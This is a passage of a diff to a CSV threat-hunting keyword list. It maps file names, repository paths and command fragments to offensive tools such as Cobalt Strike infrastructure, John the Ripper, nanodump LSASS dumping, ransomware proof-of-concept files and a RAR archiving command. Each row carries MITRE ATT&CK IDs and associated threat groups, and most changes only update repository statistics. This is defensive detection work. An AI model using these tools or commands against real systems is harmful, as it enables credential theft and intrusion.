-"*Radare2*","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Information Gathering","https://github.com/radareorg/radare2","1","0","N/A","N/A","10","18644","2911","2023-10-03T21:41:38Z","2012-07-03T07:42:26Z" -"*radius2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*radius2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Radare2*","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Information Gathering","https://github.com/radareorg/radare2","1","0","N/A","N/A","10","18645","2913","2023-10-04T08:34:11Z","2012-07-03T07:42:26Z" +"*radius2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*radius2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*RAI/ase_docker*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*rai-attack-servers.*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*RainbowCrack*","offensive_tool_keyword","RainbowCrack","The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. visit the RainbowCrack homepage","T1110 - T1208 - T1212 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://project-rainbowcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rai-redirector-dns*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*rai-redirector-http*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*raiseChild.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*raiseChild.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*rajkumardusad/onex*","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","","N/A","","","" "*rajkumardusad/Tool-X*","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","","N/A","","","" -"*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*random_c2_profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*random_c2profile.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*random_user_agent.params*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*random_user_agent.user_agent*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*random_c2_profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*random_c2profile.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*random_user_agent.params*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*random_user_agent.user_agent*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*randomalice1986@*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "*-RandomAttackPath -Token*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" "*randombob1986@*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "*randomize_sw2_seed.py*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*Ransomware POC tool that encrypts a given directory*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*Ransomware.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*Ransomware.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*ransomware_config.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*ransomware_payload.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*Ransomware.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Ransomware.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*ransomware_config.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*ransomware_payload.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*RansomwarePoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*RansomwarePoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" @@ -15538,8 +15708,8 @@ "*Rapid7*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rapid7.github.io/metasploit-framework/api/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*Rar a -v3g -k -r -s -m3 *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*rar2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 